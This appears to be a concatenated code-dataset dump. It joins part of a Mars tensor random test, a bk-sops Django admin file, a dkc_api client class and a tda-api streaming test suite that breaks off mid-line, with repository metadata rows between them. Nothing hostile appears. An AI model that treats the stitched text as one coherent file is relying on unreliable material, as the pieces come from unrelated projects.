self.assertRaises(ValueError): choice(np.random.rand(3), p=[0.2, 0.2, 0.2]) # p should b 1-d with self.assertRaises(ValueError): choice(np.random.rand(3), p=[[0.2, 0.6, 0.2]]) # replace=False, choice size cannot be greater than a.size with self.assertRaises(ValueError): choice(np.random.rand(10), 11, replace=False) # replace=False, choice size cannot be greater than a.size with self.assertRaises(ValueError): choice(np.random.rand(10), (3, 4), replace=False) def testMultivariateNormal(self): mean = [0, 0] cov = [[1, 0], [0, 100]] t = multivariate_normal(mean, cov, 5000, chunk_size=500) self.assertEqual(t.shape, (5000, 2)) self.assertEqual(t.op.size, (5000,)) t = t.tiles() self.assertEqual(t.nsplits, ((500,) * 10, (2,))) self.assertEqual(len(t.chunks), 10) c = t.chunks[0] self.assertEqual(c.shape, (500, 2)) self.assertEqual(c.op.size, (500,)) def testRandint(self): arr = randint(1, 2, size=(10, 9), dtype='f8', density=.01, chunk_size=2).tiles() self.assertEqual(arr.shape, (10, 9)) self.assertEqual(len(arr.chunks), 25) self.assertEqual(arr.chunks[0].shape, (2, 2)) self.assertEqual(arr.chunks[0].op.dtype, np.float64) self.assertEqual(arr.chunks[0].op.low, 1) self.assertEqual(arr.chunks[0].op.high, 2) self.assertEqual(arr.chunks[0].op.density, .01) def testUnexpectedKey(self): with self.assertRaises(ValueError): rand(10, 10, chunks=5) with self.assertRaises(ValueError): randn(10, 10, chunks=5) def testPermutation(self): x = permutation(10) self.assertEqual(x.shape, (10,)) self.assertIsInstance(x.op, TensorPermutation) x = x.tiles() self.assertEqual(len(x.chunks), 1) self.assertIsInstance(x.chunks[0].op, TensorPermutation) arr = from_ndarray([1, 4, 9, 12, 15], chunk_size=2) x = permutation(arr) self.assertEqual(x.shape, (5,)) self.assertIsInstance(x.op, TensorPermutation) x = x.tiles() arr = get_tiled(arr) self.assertEqual(len(x.chunks), 3) self.assertTrue(np.isnan(x.chunks[0].shape[0])) self.assertIs(x.chunks[0].inputs[0].inputs[0].inputs[0], arr.chunks[0].data) arr = rand(3, 3, chunk_size=2) x = permutation(arr) self.assertEqual(x.shape, (3, 3)) self.assertIsInstance(x.op, TensorPermutation) x = x.tiles() arr = get_tiled(arr) self.assertEqual(len(x.chunks), 4) self.assertTrue(np.isnan(x.chunks[0].shape[0])) self.assertEqual(x.chunks[0].shape[1], 2) self.assertIs(x.cix[0, 0].inputs[0].inputs[0].inputs[0], arr.cix[0, 0].data) self.assertIs(x.cix[0, 0].inputs[0].inputs[1].inputs[0], arr.cix[1, 0].data) self.assertEqual(x.cix[0, 0].op.seed, x.cix[0, 1].op.seed) self.assertEqual(x.cix[0, 0].inputs[0].inputs[0].inputs[0].op.seed, x.cix[1, 0].inputs[0].inputs[0].inputs[0].op.seed) with self.assertRaises(np.AxisError): self.assertRaises(permutation('abc')) def testShuffle(self): with self.assertRaises(TypeError): shuffle('abc') x = rand(10, 10, chunk_size=2) shuffle(x) self.assertIsInstance(x.op, TensorPermutation) x = rand(10, 10, chunk_size=2) shuffle(x, axis=1) self.assertIsInstance(x.op, TensorPermutation) self.assertEqual(x.op.axis, 1)
34.487179
89
0.603866
68fd0f32abe61ac99f1b2bfc403791712c028f2b
1,300
py
Python
files/admin.py
springborland/bk-sops
a9057672c10efb5f2414a805a30ead4092429c76
[ "Apache-2.0" ]
1
2021-05-19T04:31:34.000Z
2021-05-19T04:31:34.000Z
files/admin.py
ZhuoZhuoCrayon/bk-sops
d1475d53c19729915727ce7adc24e3226f15e332
[ "Apache-2.0" ]
null
null
null
files/admin.py
ZhuoZhuoCrayon/bk-sops
d1475d53c19729915727ce7adc24e3226f15e332
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from django.contrib import admin from files import models @admin.register(models.UploadModuleFileTag) class UploadModuleFileTagAdmin(admin.ModelAdmin): list_display = ["id", "source_ip", "file_name", "file_path"] search_fields = ["id", "source_ip", "file_name", "file_path"] @admin.register(models.UploadTicket) class UploadTicketAdmin(admin.ModelAdmin): list_display = ["id", "code", "applicant", "apply_from", "created_at", "is_available", "used_at"] search_fields = ["id", "code", "applicant", "apply_from"] list_filter = ["is_available"]
43.333333
115
0.758462
a0879e316536ea873328ca91a906c869dc356bda
11,521
py
Python
dkc_api/v1/objects/content/content.py
Blackgard/dkc-api
9c221f4fdb862aacc404010d7708637b1a84b800
[ "MIT" ]
1
2022-03-09T06:09:59.000Z
2022-03-09T06:09:59.000Z
dkc_api/v1/objects/content/content.py
Blackgard/dkc-api
9c221f4fdb862aacc404010d7708637b1a84b800
[ "MIT" ]
null
null
null
dkc_api/v1/objects/content/content.py
Blackgard/dkc-api
9c221f4fdb862aacc404010d7708637b1a84b800
[ "MIT" ]
null
null
null
from __future__ import annotations from typing import Union from dkc_api.v1.const import URL_DOMAIN from dkc_api.v1.models.error import ResponceError, ResponceErrorAlternative from dkc_api.v1.exceptions.exceptions import NotValidVariables from .models import GetRevisionLastSize, GetRevisionLast, GetRevisionDrawings, GetRevisionCertificates, GetRevisionMaterials, \ GetFile, PostFile, PostFileContent import loguru import requests import datetime from pydantic.error_wrappers import ValidationError class Content: """ Class for interacting with available operations for working with site news """ def __init__(self, access_token: str, headers: dict, debug: bool=False, logger: loguru.Logger = loguru.logger): """ Class for interacting with available operations for working with site news """ self.access_token = access_token self.headers = headers self.logger = logger self.debug = debug def getRevisionsLastSize(self, last_updated: datetime.datetime=None) -> Union[GetRevisionLastSize, ResponceError]: """ Get data about the size of the update in bytes. If 0 - there are no updates hour. Args: last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format. Returns: Union[GetRevisionLastSize, ResponceError]: Return revision last size. Example: >>> dkc_api.Content.getRevisionsLastSize() > getRevisionsLastSize({"size": 67602981, "forced_update": false}) >>> dkc_api.Content.getRevisionsLastSize(last_updated=datetime.datetime.now()) > getRevisionsLastSize({"size": 0, "forced_update": false}) """ send_last_updated = "" if last_updated is not None and isinstance(last_updated, datetime.datetime): send_last_updated = f"last_updated={int(last_updated.timestamp())}" elif last_updated is not None and not isinstance(last_updated, datetime.datetime): raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.") if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}") responce = requests.get(f"{URL_DOMAIN}/revisions/last/size?{send_last_updated}", headers=self.headers) try: return GetRevisionLastSize(**responce.json()) except ValidationError: if responce.status_code == 500 or responce.status_code == 403: return ResponceErrorAlternative(**responce.json()) return ResponceError(**{"code": responce.status_code, **responce.json() }) def getRevisionsLast(self, last_updated: datetime.datetime=None) -> Union[GetRevisionLast, ResponceError]: """ An array containing a complete data upload or delta of changes, if the last_updated parameter is specified. Args: last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format. Returns: Union[GetRevisionLast, ResponceError]: Return revision last size. Example: >>> dkc_api.Content.GetRevisionLast() > GetRevisionLast(revision={delta=false, countries={updated=[{...}], removed=[{...}]}, ...}) """ send_last_updated = "" if last_updated is not None and isinstance(last_updated, datetime.datetime): send_last_updated = f"last_updated={int(last_updated.timestamp())}" elif last_updated is not None and not isinstance(last_updated, datetime.datetime): raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.") if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}") responce = requests.get(f"{URL_DOMAIN}/revisions/last?{send_last_updated}", headers=self.headers) try: return GetRevisionLast(**responce.json()) except ValidationError: if responce.status_code == 500 or responce.status_code == 403: return ResponceErrorAlternative(**responce.json()) return ResponceError(**{"code": responce.status_code, **responce.json() }) def getRevisionDrawings(self, last_updated: datetime.datetime=None) -> Union[GetRevisionDrawings, ResponceError]: """ An array containing the complete data upload or delta of changes, if the last_updated by drawings parameter is specified. Args: last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format. Returns: Union[GetRevisionDrawings, ResponceError]: Return revision last size. Example: >>> dkc_api.Content.GetRevisionDrawings() > GetRevisionDrawings(revision={delta=false, countries={updated=[{...}], removed=[{...}]}, ...}) """ send_last_updated = "" if last_updated is not None and isinstance(last_updated, datetime.datetime): send_last_updated = f"last_updated={int(last_updated.timestamp())}" elif last_updated is not None and not isinstance(last_updated, datetime.datetime): raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.") if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}") responce = requests.get(f"{URL_DOMAIN}/revisions/drawings?{send_last_updated}", headers=self.headers) try: return GetRevisionDrawings(**responce.json()) except ValidationError: if responce.status_code == 500 or responce.status_code == 403: return ResponceErrorAlternative(**responce.json()) return ResponceError(**{"code": responce.status_code, **responce.json() }) def getRevisionCertificates(self, last_updated: datetime.datetime=None) -> Union[GetRevisionCertificates, ResponceError]: """ An array containing the complete data upload or delta of changes, if the last_updated by drawings parameter is specified. Args: last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format. Returns: Union[GetRevisionCertificates, ResponceError]: Return revision last size. Example: >>> dkc_api.Content.GetRevisionCertificates() > GetRevisionCertificates(revision={delta=false, countries={updated=[{...}], removed=[{...}]}, ...}) """ send_last_updated = "" if last_updated is not None and isinstance(last_updated, datetime.datetime): send_last_updated = f"last_updated={int(last_updated.timestamp())}" elif last_updated is not None and not isinstance(last_updated, datetime.datetime): raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.") if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}") responce = requests.get(f"{URL_DOMAIN}/revisions/certificates?{send_last_updated}", headers=self.headers) try: return GetRevisionCertificates(**responce.json()) except ValidationError: if responce.status_code == 500 or responce.status_code == 403: return ResponceErrorAlternative(**responce.json()) return ResponceError(**{"code": responce.status_code, **responce.json() }) def getRevisionMaterials(self, last_updated: datetime.datetime=None) -> Union[GetRevisionMaterials, ResponceError]: """ An array containing the complete data upload or delta of changes, if the last_updated by drawings parameter is specified. Args: last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format. Returns: Union[GetRevisionMaterials, ResponceError]: Return revision last size. Example: >>> dkc_api.Content.GetRevisionMaterials() > GetRevisionMaterials(revision={delta=false, countries={updated=[{...}], removed=[{...}]}, ...}) """ send_last_updated = "" if last_updated is not None and isinstance(last_updated, datetime.datetime): send_last_updated = f"last_updated={int(last_updated.timestamp())}" elif last_updated is not None and not isinstance(last_updated, datetime.datetime): raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.") if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}") responce = requests.get(f"{URL_DOMAIN}/revisions/materials?{send_last_updated}", headers=self.headers) self.logger.debug(responce.json()) try: return GetRevisionMaterials(**responce.json()) except ValidationError: if responce.status_code == 500 or responce.status_code == 403: return ResponceErrorAlternative(**responce.json()) return ResponceError(**{"code": responce.status_code, **responce.json() }) def getFile(self, file_id: int) -> Union[GetFile, ResponceError]: """ Method for getting files via API Args: file_id (int): id file. Returns: Union[GetFile, ResponceError]: Return file name and content. Example: >>> dkc_api.Content.getFile(id=1) > getFile({name="Спецификация.txt", content="MUAyODExMjAxOUBAMzYwNTA1QDEwQNCo0KJADQoyQDI4MTEyM..."}) """ if not isinstance(file_id, int): raise NotValidVariables(f"Variables id not valid int class. Getting {type(file_id)} class.") responce = requests.get(f"{URL_DOMAIN}/file?id={file_id}", headers=self.headers) try: return GetFile(**responce.json()) except ValidationError: if responce.status_code == 500 or responce.status_code == 403: return ResponceErrorAlternative(**responce.json()) return ResponceError(**{"code": responce.status_code, **responce.json() }) def postFile(self, file_content: PostFileContent) -> Union[PostFile, ResponceError]: """ Method for getting files via API Args: file_content (PostFileContent): file content. Returns: Union[PostFile, ResponceError]: Return file name id. Example: >>> dkc_api.Content.PostFile(PostFileContent={name="file_with_key.txt", value="8-khkjgj7hgJHGJHG97jhHKJ"}) > PostFile({id=889}) """ if not isinstance(file_content, PostFileContent): raise NotValidVariables(f"Variables file_content not valid PostFileContent class. Getting {type(file_content)} class.") responce = requests.post(f"{URL_DOMAIN}/file", data=file_content.dict(), headers=self.headers) try: return PostFile(**responce.json()) except ValidationError: if responce.status_code == 500 or responce.status_code == 403: return ResponceErrorAlternative(**responce.json()) return ResponceError(**{"code": responce.status_code, **responce.json() })
49.659483
133
0.66522
aa264d637da4be6cdb018c2a4cc915b2e947af69
150,554
py
Python
tests/streaming_test.py
r4m0n/tda-api
ceb2f15c0be0fd51e9c586cfe3604d97ba832e55
[ "MIT" ]
null
null
null
tests/streaming_test.py
r4m0n/tda-api
ceb2f15c0be0fd51e9c586cfe3604d97ba832e55
[ "MIT" ]
null
null
null
tests/streaming_test.py
r4m0n/tda-api
ceb2f15c0be0fd51e9c586cfe3604d97ba832e55
[ "MIT" ]
null
null
null
import tda import urllib.parse import json import copy from .utils import (account_principals, has_diff, MockResponse, no_duplicates, AsyncMagicMock) import asynctest from unittest.mock import ANY, call, MagicMock, Mock from tda import streaming import asyncio StreamClient = streaming.StreamClient ACCOUNT_ID = 1000 TOKEN_TIMESTAMP = '2020-05-22T02:12:48+0000' class StreamClientTest(asynctest.TestCase): def setUp(self): self.http_client = MagicMock() self.client = StreamClient(self.http_client) self.maxDiff = None def account(self, index): account = account_principals()['accounts'][0] account['accountId'] = str(ACCOUNT_ID + index) def parsable_as_int(s): try: int(s) return True except ValueError: return False for key, value in list(account.items()): if isinstance(value, str) and not parsable_as_int(value): account[key] = value + '-' + str(account['accountId']) return account def stream_key(self, index): return {'key': 'streamerSubscriptionKeys-keys-key' + str(index)} def request_from_socket_mock(self, socket): return json.loads( socket.send.call_args_list[0][0][0])['requests'][0] def success_response(self, request_id, service, command): return { 'response': [ { 'service': service, 'requestid': str(request_id), 'command': command, 'timestamp': 1590116673258, 'content': { 'code': 0, 'msg': 'success' } } ] } def streaming_entry(self, service, command, content=None): d = { 'data': [{ 'service': service, 'command': command, 'timestamp': 1590186642440 }] } if content: d['data'][0]['content'] = content return d def assert_handler_called_once_with(self, handler, expected): handler.assert_called_once() self.assertEqual(len(handler.call_args_list[0]), 2) data = handler.call_args_list[0][0][0] # Mock from <- 3.7 has a bad api self.assertFalse(has_diff(data, expected)) async def login_and_get_socket(self, ws_connect): principals = account_principals() self.http_client.get_user_principals.return_value = MockResponse( principals, 200) socket = AsyncMagicMock() ws_connect.return_value = socket socket.recv.side_effect = [json.dumps(self.success_response( 0, 'ADMIN', 'LOGIN'))] await self.client.login() socket.reset_mock() return socket ########################################################################## # Login @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_login_single_account_success(self, ws_connect): principals = account_principals() principals['accounts'].clear() principals['accounts'].append(self.account(1)) principals['streamerSubscriptionKeys']['keys'].clear() principals['streamerSubscriptionKeys']['keys'].append( self.stream_key(1)) self.http_client.get_user_principals.return_value = MockResponse( principals, 200) socket = AsyncMagicMock() ws_connect.return_value = socket socket.recv.side_effect = [json.dumps(self.success_response( 0, 'ADMIN', 'LOGIN'))] await self.client.login() socket.send.assert_awaited_once() request = self.request_from_socket_mock(socket) creds = urllib.parse.parse_qs(request['parameters']['credential']) self.assertEqual(creds['userid'], ['1001']) self.assertEqual(creds['token'], ['streamerInfo-token']) self.assertEqual(creds['company'], ['accounts-company-1001']) self.assertEqual( creds['cddomain'], ['accounts-accountCdDomainId-1001']) self.assertEqual(creds['usergroup'], ['streamerInfo-userGroup']) self.assertEqual(creds['accesslevel'], ['streamerInfo-accessLevel']) self.assertEqual(creds['authorized'], ['Y']) self.assertEqual(creds['timestamp'], ['1590113568000']) self.assertEqual(creds['appid'], ['streamerInfo-appId']) self.assertEqual(creds['acl'], ['streamerInfo-acl']) self.assertEqual(request['parameters']['token'], 'streamerInfo-token') self.assertEqual(request['parameters']['version'], '1.0') self.assertEqual(request['requestid'], '0') self.assertEqual(request['service'], 'ADMIN') self.assertEqual(request['command'], 'LOGIN') @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_login_single_account_success_async(self, ws_connect): ''' Same as test_login_single_account_success except the underlying client is asynchronous and returns a coroutine for get_user_principals. ''' principals = account_principals() principals['accounts'].clear() principals['accounts'].append(self.account(1)) principals['streamerSubscriptionKeys']['keys'].clear() principals['streamerSubscriptionKeys']['keys'].append( self.stream_key(1)) async def get_user_principals(*args, **kwargs): return MockResponse(principals, 200) self.http_client.get_user_principals = get_user_principals socket = AsyncMagicMock() ws_connect.return_value = socket socket.recv.side_effect = [json.dumps(self.success_response( 0, 'ADMIN', 'LOGIN'))] await self.client.login() socket.send.assert_awaited_once() request = self.request_from_socket_mock(socket) creds = urllib.parse.parse_qs(request['parameters']['credential']) self.assertEqual(creds['userid'], ['1001']) self.assertEqual(creds['token'], ['streamerInfo-token']) self.assertEqual(creds['company'], ['accounts-company-1001']) self.assertEqual( creds['cddomain'], ['accounts-accountCdDomainId-1001']) self.assertEqual(creds['usergroup'], ['streamerInfo-userGroup']) self.assertEqual(creds['accesslevel'], ['streamerInfo-accessLevel']) self.assertEqual(creds['authorized'], ['Y']) self.assertEqual(creds['timestamp'], ['1590113568000']) self.assertEqual(creds['appid'], ['streamerInfo-appId']) self.assertEqual(creds['acl'], ['streamerInfo-acl']) self.assertEqual(request['parameters']['token'], 'streamerInfo-token') self.assertEqual(request['parameters']['version'], '1.0') self.assertEqual(request['requestid'], '0') self.assertEqual(request['service'], 'ADMIN') self.assertEqual(request['command'], 'LOGIN') @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_login_multiple_accounts_require_account_id(self, ws_connect): principals = account_principals() principals['accounts'].clear() principals['accounts'].append(self.account(1)) principals['accounts'].append(self.account(2)) principals['streamerSubscriptionKeys']['keys'].clear() principals['streamerSubscriptionKeys']['keys'].append( self.stream_key(1)) principals['streamerSubscriptionKeys']['keys'].append( self.stream_key(2)) self.http_client.get_user_principals.return_value = MockResponse( principals, 200) with self.assertRaisesRegex(ValueError, '.*initialized with unspecified account_id.*'): await self.client.login() ws_connect.assert_not_called() @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_login_multiple_accounts_with_account_id(self, ws_connect): principals = account_principals() principals['accounts'].clear() principals['accounts'].append(self.account(1)) principals['accounts'].append(self.account(2)) principals['streamerSubscriptionKeys']['keys'].clear() principals['streamerSubscriptionKeys']['keys'].append( self.stream_key(1)) principals['streamerSubscriptionKeys']['keys'].append( self.stream_key(2)) self.http_client.get_user_principals.return_value = MockResponse( principals, 200) socket = AsyncMagicMock() ws_connect.return_value = socket socket.recv.side_effect = [json.dumps(self.success_response( 0, 'ADMIN', 'LOGIN'))] self.client = StreamClient(self.http_client, account_id=1002) await self.client.login() socket.send.assert_awaited_once() request = self.request_from_socket_mock(socket) creds = urllib.parse.parse_qs(request['parameters']['credential']) self.assertEqual(creds['userid'], ['1002']) self.assertEqual(creds['token'], ['streamerInfo-token']) self.assertEqual(creds['company'], ['accounts-company-1002']) self.assertEqual( creds['cddomain'], ['accounts-accountCdDomainId-1002']) self.assertEqual(creds['usergroup'], ['streamerInfo-userGroup']) self.assertEqual(creds['accesslevel'], ['streamerInfo-accessLevel']) self.assertEqual(creds['authorized'], ['Y']) self.assertEqual(creds['timestamp'], ['1590113568000']) self.assertEqual(creds['appid'], ['streamerInfo-appId']) self.assertEqual(creds['acl'], ['streamerInfo-acl']) self.assertEqual(request['parameters']['token'], 'streamerInfo-token') self.assertEqual(request['parameters']['version'], '1.0') self.assertEqual(request['requestid'], '0') self.assertEqual(request['service'], 'ADMIN') self.assertEqual(request['command'], 'LOGIN') @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_login_unrecognized_account_id(self, ws_connect): principals = account_principals() principals['accounts'].clear() principals['accounts'].append(self.account(1)) principals['accounts'].append(self.account(2)) principals['streamerSubscriptionKeys']['keys'].clear() principals['streamerSubscriptionKeys']['keys'].append( self.stream_key(1)) principals['streamerSubscriptionKeys']['keys'].append( self.stream_key(2)) self.http_client.get_user_principals.return_value = MockResponse( principals, 200) self.client = StreamClient(self.http_client, account_id=999999) with self.assertRaisesRegex(ValueError, '.*no account found with account_id 999999.*'): await self.client.login() ws_connect.assert_not_called() @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_login_bad_response(self, ws_connect): principals = account_principals() principals['accounts'].clear() principals['accounts'].append(self.account(1)) principals['streamerSubscriptionKeys']['keys'].clear() principals['streamerSubscriptionKeys']['keys'].append( self.stream_key(1)) self.http_client.get_user_principals.return_value = MockResponse( principals, 200) socket = AsyncMagicMock() ws_connect.return_value = socket response = self.success_response(0, 'ADMIN', 'LOGIN') response['response'][0]['content']['code'] = 21 response['response'][0]['content']['msg'] = 'failed for some reason' socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.login() @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_login_no_ssl_context(self, ws_connect): self.client = StreamClient(self.http_client) self.http_client.get_user_principals.return_value = MockResponse( account_principals(), 200) socket = AsyncMagicMock() ws_connect.return_value = socket socket.recv.side_effect = [json.dumps(self.success_response( 0, 'ADMIN', 'LOGIN'))] await self.client.login() ws_connect.assert_awaited_once_with(ANY) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_login_ssl_context(self, ws_connect): self.client = StreamClient(self.http_client, ssl_context='ssl_context') self.http_client.get_user_principals.return_value = MockResponse( account_principals(), 200) socket = AsyncMagicMock() ws_connect.return_value = socket socket.recv.side_effect = [json.dumps(self.success_response( 0, 'ADMIN', 'LOGIN'))] await self.client.login() ws_connect.assert_awaited_once_with(ANY, ssl='ssl_context') @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_login_unexpected_request_id(self, ws_connect): principals = account_principals() principals['accounts'].clear() principals['accounts'].append(self.account(1)) principals['streamerSubscriptionKeys']['keys'].clear() principals['streamerSubscriptionKeys']['keys'].append( self.stream_key(1)) self.http_client.get_user_principals.return_value = MockResponse( principals, 200) socket = AsyncMagicMock() ws_connect.return_value = socket response = self.success_response(0, 'ADMIN', 'LOGIN') response['response'][0]['requestid'] = 9999 socket.recv.side_effect = [json.dumps(response)] with self.assertRaisesRegex(tda.streaming.UnexpectedResponse, 'unexpected requestid: 9999'): await self.client.login() @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_login_unexpected_service(self, ws_connect): principals = account_principals() principals['accounts'].clear() principals['accounts'].append(self.account(1)) principals['streamerSubscriptionKeys']['keys'].clear() principals['streamerSubscriptionKeys']['keys'].append( self.stream_key(1)) self.http_client.get_user_principals.return_value = MockResponse( principals, 200) socket = AsyncMagicMock() ws_connect.return_value = socket response = self.success_response(0, 'NOT_ADMIN', 'LOGIN') socket.recv.side_effect = [json.dumps(response)] with self.assertRaisesRegex(tda.streaming.UnexpectedResponse, 'unexpected service: NOT_ADMIN'): await self.client.login() @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_login_unexpected_command(self, ws_connect): principals = account_principals() principals['accounts'].clear() principals['accounts'].append(self.account(1)) principals['streamerSubscriptionKeys']['keys'].clear() principals['streamerSubscriptionKeys']['keys'].append( self.stream_key(1)) self.http_client.get_user_principals.return_value = MockResponse( principals, 200) socket = AsyncMagicMock() ws_connect.return_value = socket response = self.success_response(0, 'ADMIN', 'NOT_LOGIN') socket.recv.side_effect = [json.dumps(response)] with self.assertRaisesRegex(tda.streaming.UnexpectedResponse, 'unexpected command: NOT_LOGIN'): await self.client.login() ########################################################################## # QOS @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_qos_success(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'ADMIN', 'QOS'))] await self.client.quality_of_service(StreamClient.QOSLevel.EXPRESS) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'ADMIN', 'command': 'QOS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'qoslevel': '0' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_qos_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'ADMIN', 'QOS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.quality_of_service(StreamClient.QOSLevel.EXPRESS) socket.recv.assert_awaited_once() ########################################################################## # ACCT_ACTIVITY @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_account_activity_subs_success(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'ACCT_ACTIVITY', 'SUBS'))] await self.client.account_activity_sub() socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'ACCT_ACTIVITY', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'streamerSubscriptionKeys-keys-key', 'fields': '0,1,2,3' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_account_activity_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'ACCT_ACTIVITY', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.account_activity_sub() @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_account_activity_handler(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = { 'data': [ { 'service': 'ACCT_ACTIVITY', 'timestamp': 1591754497594, 'command': 'SUBS', 'content': [ { 'seq': 1, 'key': 'streamerSubscriptionKeys-keys-key', '1': '1001', '2': 'OrderEntryRequest', '3': '' } ] } ] } socket.recv.side_effect = [ json.dumps(self.success_response(1, 'ACCT_ACTIVITY', 'SUBS')), json.dumps(stream_item)] await self.client.account_activity_sub() handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_account_activity_handler(handler) self.client.add_account_activity_handler(async_handler) await self.client.handle_message() expected_item = { 'service': 'ACCT_ACTIVITY', 'timestamp': 1591754497594, 'command': 'SUBS', 'content': [ { 'seq': 1, 'key': 'streamerSubscriptionKeys-keys-key', 'ACCOUNT': '1001', 'MESSAGE_TYPE': 'OrderEntryRequest', 'MESSAGE_DATA': '' } ] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################## # CHART_EQUITY @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_chart_equity_subs_and_add_success(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'CHART_EQUITY', 'SUBS'))] await self.client.chart_equity_subs(['GOOG', 'MSFT']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'CHART_EQUITY', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG,MSFT', 'fields': '0,1,2,3,4,5,6,7,8' } }) socket.reset_mock() socket.recv.side_effect = [json.dumps(self.success_response( 2, 'CHART_EQUITY', 'ADD'))] await self.client.chart_equity_add(['INTC']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'CHART_EQUITY', 'command': 'ADD', 'requestid': '2', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'INTC', 'fields': '0,1,2,3,4,5,6,7,8' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_chart_equity_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'CHART_EQUITY', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.chart_equity_subs(['GOOG', 'MSFT']) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_chart_equity_add_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response_subs = self.success_response(1, 'CHART_EQUITY', 'SUBS') response_add = self.success_response(2, 'CHART_EQUITY', 'ADD') response_add['response'][0]['content']['code'] = 21 socket.recv.side_effect = [ json.dumps(response_subs), json.dumps(response_add)] await self.client.chart_equity_subs(['GOOG', 'MSFT']) with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.chart_equity_add(['INTC']) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_chart_equity_handler(self, ws_connect): socket = await 